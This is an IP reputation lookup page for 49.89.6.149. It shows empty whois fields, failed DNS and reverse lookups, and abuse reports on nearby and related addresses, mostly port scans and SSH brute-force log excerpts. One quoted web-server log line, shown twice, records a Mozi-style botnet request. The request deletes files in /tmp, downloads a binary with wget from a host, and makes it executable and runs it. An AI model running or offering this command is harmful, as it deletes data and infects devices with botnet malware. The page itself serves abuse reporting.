49.89.6.149 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
49.89.6.83	attackspambots	Probing for open proxy via GET parameter of web address and/or web log spamming. 49.89.6.83 - - [23/Aug/2020:03:48:29 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 154 "-" "Hello, world"	2020-08-23 18:00:53
49.89.6.19	attackspam	SIP/5060 Probe, BF, Hack -	2020-01-25 03:25:35
49.89.69.207	attack	SIP/5060 Probe, BF, Hack -	2020-01-25 03:23:52

Type

Details

Datetime

49.89.6.83

attackspambots

Probing for open proxy via GET parameter of web address and/or web log spamming.

49.89.6.83 - - [23/Aug/2020:03:48:29 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 154 "-" "Hello, world"

2020-08-23 18:00:53

49.89.6.19

attackspam

SIP/5060 Probe, BF, Hack -

2020-01-25 03:25:35

49.89.69.207

attack

SIP/5060 Probe, BF, Hack -

2020-01-25 03:23:52

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 49.89.6.149
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 44334
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;49.89.6.149.			IN	A

;; AUTHORITY SECTION:
.			590	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022020700 1800 900 604800 86400

;; Query time: 19 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Feb 07 15:48:05 CST 2022
;; MSG SIZE  rcvd: 104

Host info

Host 149.6.89.49.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 149.6.89.49.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
223.16.215.101	attackspambots	23/tcp 5555/tcp... [2020-01-05/02-09]6pkt,2pt.(tcp)	2020-02-09 21:51:07
96.80.251.85	attack	23/tcp 37215/tcp... [2019-12-22/2020-02-09]8pkt,2pt.(tcp)	2020-02-09 22:11:06
59.115.49.70	attackbots	Fail2Ban Ban Triggered	2020-02-09 22:22:14
122.102.33.222	attackspambots	23/tcp 23/tcp [2020-02-07/09]2pkt	2020-02-09 22:36:28
178.46.210.136	attackspam	23/tcp 23/tcp 23/tcp... [2020-02-07/08]16pkt,1pt.(tcp)	2020-02-09 22:37:09
221.176.241.48	attack	Feb 9 04:10:45 hpm sshd\[18160\]: Invalid user uqa from 221.176.241.48 Feb 9 04:10:45 hpm sshd\[18160\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.176.241.48 Feb 9 04:10:47 hpm sshd\[18160\]: Failed password for invalid user uqa from 221.176.241.48 port 2794 ssh2 Feb 9 04:15:45 hpm sshd\[18833\]: Invalid user ygw from 221.176.241.48 Feb 9 04:15:45 hpm sshd\[18833\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.176.241.48	2020-02-09 22:17:45
95.9.185.37	attackspambots	Unauthorized connection attempt detected from IP address 95.9.185.37 to port 445	2020-02-09 22:25:31
198.108.66.90	attackbots	8088/tcp 20000/tcp 8883/tcp... [2019-12-16/2020-02-09]9pkt,9pt.(tcp)	2020-02-09 22:21:07
77.221.81.100	attackspambots	Feb 9 14:37:28 grey postfix/smtpd\[12675\]: NOQUEUE: reject: RCPT from data2-81-100.cgates.lt\[77.221.81.100\]: 554 5.7.1 Service unavailable\; Client host \[77.221.81.100\] blocked using truncate.gbudb.net\; http://www.gbudb.com/truncate/ \[77.221.81.100\]\; from=\ to=\ proto=ESMTP helo=\ ...	2020-02-09 22:03:55
80.14.47.171	attack	Feb 9 04:06:51 auw2 sshd\[7434\]: Invalid user xok from 80.14.47.171 Feb 9 04:06:51 auw2 sshd\[7434\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=lstlambert-656-1-165-171.w80-14.abo.wanadoo.fr Feb 9 04:06:53 auw2 sshd\[7434\]: Failed password for invalid user xok from 80.14.47.171 port 39590 ssh2 Feb 9 04:09:56 auw2 sshd\[7882\]: Invalid user fui from 80.14.47.171 Feb 9 04:09:56 auw2 sshd\[7882\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=lstlambert-656-1-165-171.w80-14.abo.wanadoo.fr	2020-02-09 22:12:19
40.65.127.97	attackspam	Feb 9 15:07:19 [host] sshd[23214]: Invalid user g Feb 9 15:07:20 [host] sshd[23214]: pam_unix(sshd: Feb 9 15:07:21 [host] sshd[23214]: Failed passwor	2020-02-09 22:16:30
222.186.42.7	attack	Feb 9 13:48:38 zeus sshd[13579]: Failed password for root from 222.186.42.7 port 41973 ssh2 Feb 9 13:48:41 zeus sshd[13579]: Failed password for root from 222.186.42.7 port 41973 ssh2 Feb 9 13:48:45 zeus sshd[13579]: Failed password for root from 222.186.42.7 port 41973 ssh2 Feb 9 13:56:23 zeus sshd[13652]: Failed password for root from 222.186.42.7 port 53806 ssh2	2020-02-09 21:59:07
76.73.193.60	attackbotsspam	Brute forcing email accounts	2020-02-09 22:30:06
51.91.8.222	attackbots	Automatic report - SSH Brute-Force Attack	2020-02-09 22:22:41
45.253.26.216	attackspambots	$f2bV_matches	2020-02-09 22:04:22

Recently Reported IPs

186.33.86.159	182.186.20.125	176.118.145.146	136.0.61.110
117.159.39.86	4.16.142.230	88.1.62.125	192.95.115.148
72.66.65.189	185.204.1.215	139.224.50.39	118.69.176.205
51.250.17.27	46.101.54.191	185.42.192.234	34.230.89.25
208.67.42.98	103.144.223.254	103.240.100.22	177.104.26.218